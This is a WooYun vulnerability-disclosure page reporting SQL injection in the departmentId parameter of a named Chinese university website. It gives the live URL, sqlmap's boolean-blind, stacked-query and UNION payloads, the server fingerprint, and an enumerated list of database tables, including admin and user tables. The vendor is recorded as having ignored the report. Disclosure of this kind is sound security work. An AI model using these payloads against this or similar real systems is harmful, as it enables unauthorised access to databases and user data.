当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178137

漏洞标题:中南林业科技大学某站存在SQL注入漏洞可UNION

相关厂商:中南林业科技大学

漏洞作者: 路人甲

提交时间:2016-02-24 09:47

修复时间:2016-02-29 09:50

公开时间:2016-02-29 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-24: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://woodscience.csuft.edu.cn/test/Common/GetDataHandler.ashx?departmentId=20&key=GetProfessionComboboxJson

5.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: departmentId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: departmentId=20 AND 6267=6267&key=GetProfessionComboboxJson
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: departmentId=20;WAITFOR DELAY '0:0:5'--&key=GetProfessionComboboxJson
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: departmentId=20 UNION ALL SELECT 18,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(69)+CHAR(77)+CHAR(100)+CHAR(83)+CHAR(85)+CHAR(88)+CHAR(73)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113),18-- &key=GetProfessionComboboxJson
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: zdzxwdata
[114 tables]
+-----------------------+
| PE_AdZone |
| PE_Admin |
| PE_Advertisement |
| PE_Announce |
| PE_AreaCollection |
| PE_Article |
| PE_Author |
| PE_Bank |
| PE_BankrollItem |
| PE_Card |
| PE_Channel |
| PE_City |
| PE_Class |
| PE_Classroom |
| PE_Client |
| PE_Comment |
| PE_Company |
| PE_ComplainItem |
| PE_Config |
| PE_ConsumeLog |
| PE_Contacter |
| PE_CopyFrom |
| PE_Country |
| PE_DeliverCharge |
| PE_DeliverItem |
| PE_DeliverType |
| PE_Dictionary |
| PE_DownError |
| PE_DownServer |
| PE_Equipment |
| PE_Favorite |
| PE_Field |
| PE_Filters |
| PE_Friend |
| PE_FriendSite |
| PE_FsKind |
| PE_GuestBook |
| PE_GuestKind |
| PE_HistrolyNews |
| PE_HouseArea |
| PE_HouseCS |
| PE_HouseCZ |
| PE_HouseConfig |
| PE_HouseHZ |
| PE_HouseQG |
| PE_HouseQZ |
| PE_InfoS |
| PE_InvoiceItem |
| PE_Item |
| PE_JobCategory |
| PE_JsFile |
| PE_KeyLink |
| PE_Label |
| PE_Log |
| PE_Message |
| PE_NewKeys |
| PE_OrderForm |
| PE_OrderFormItem |
| PE_Page |
| PE_PageClass |
| PE_Payment |
| PE_PaymentType |
| PE_Photo |
| PE_Position |
| PE_PositionSupplyInfo |
| PE_PresentProject |
| PE_Producer |
| PE_Product |
| PE_Province |
| PE_RechargeLog |
| PE_Resume |
| PE_ServiceItem |
| PE_ShoppingCarts |
| PE_Skin |
| PE_Soft |
| PE_Space |
| PE_SpaceBook |
| PE_SpaceComment |
| PE_SpaceDiary |
| PE_SpaceKind |
| PE_SpaceLink |
| PE_SpaceMusic |
| PE_SpacePhoto |
| PE_SpaceVisitor |
| PE_Special |
| PE_SubCompany |
| PE_Supply |
| PE_Supply_Company |
| PE_Survey |
| PE_SurveyAnswer |
| PE_SurveyInput |
| PE_SurveyQuestion |
| PE_Template |
| PE_TemplateProject |
| PE_Trademark |
| PE_TransferItem |
| PE_UsedDetail |
| PE_User |
| PE_UserGroup |
| PE_Vote |
| PE_WorkPlace |
| ZD_DL |
| ZD_DWCXRZ |
| ZD_DWK |
| ZD_DX |
| ZD_TempKYDW |
| ZD_TempZDBX |
| ZD_ZDBG |
| ZD_ZDBXK |
| ZD_ZDBXTYC |
| ZD_ZDCXRZ |
| ZD_ZDTZBXK |
| ZD_jjyw |
| dtproperties |
+-----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-29 09:50

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无